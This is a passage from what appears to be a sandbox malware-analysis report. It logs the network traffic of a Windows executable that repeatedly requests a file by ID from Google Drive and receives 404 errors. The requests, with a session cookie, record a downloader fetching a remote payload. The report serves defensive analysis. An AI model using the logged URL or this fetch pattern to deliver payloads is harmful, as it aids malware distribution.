                                                        X-GUploader-UploadID: AFIdbgQY9uwTbfrc2XWd67WsUvNP6pgJGtq08kJCizlg3n_Qk8bvs51hZ6IdVmXK3F9CET7NBvpoxJk
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:46:43 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-EIMr6JBmjIA9V9IbEYN30w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4; expires=Sat, 12-Jul-2025 14:46:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:46:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 55 6c 4c 56 72 59 51 5f 67 58 35 38 57 68 66 7a 6e 48 45 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cUlLVrYQ_gX58WhfznHEYg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.1049917216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:46:54 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:46:54 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:46:54 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-prWv05tgZbdEC7_h47uXdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.1049925142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:46:55 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:46:56 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7hLsvh8M5LljU14n8npZ-HPOaXrxVKvrf8bcuVnF2BXQx2fWxUUgUkYf2Z1dT4j_NuI6ihP2k
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:46:55 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-DaVE8Uahnw38VEV5cmDUvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:46:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 33 76 43 66 66 66 67 39 57 78 43 49 31 6a 73 72 62 54 48 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a3vCfffg9WxCI1jsrbTHSw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.1049979216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:06 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:07 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:06 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-MimgsbYGv5ZD96v9UFAZ6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.1049980142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:07 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:08 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4TBrQ_Fp3sbHlN_ZHDXxPx0DE-RgcXtrzFJhG893uiM7yGOg6kXWzErg12dOOdR96iA9j908g
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:08 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-7e3kLz7IRHszEqhIjf7SUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:47:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 32 5f 55 54 33 54 34 36 7a 78 36 35 35 39 71 69 53 5f 47 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="42_UT3T46zx6559qiS_Guw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.1049982216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:18 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:19 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:19 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-wmP6zTeFWVANppYEi7gGuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.1049983142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:19 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:20 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgTzUnDpzegSZUXLR0lzrpp1gehyFLNUdFp5fzVVpoX34js9APPCE5mOrt0XogztPc2e
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:20 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-dKDFNqJAh2X73NAczgyJ-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:47:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4b 56 4a 6d 67 45 54 4c 56 56 63 6f 38 72 53 71 6c 30 34 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xKVJmgETLVVco8rSql04Dw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.1049984216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:31 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:31 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
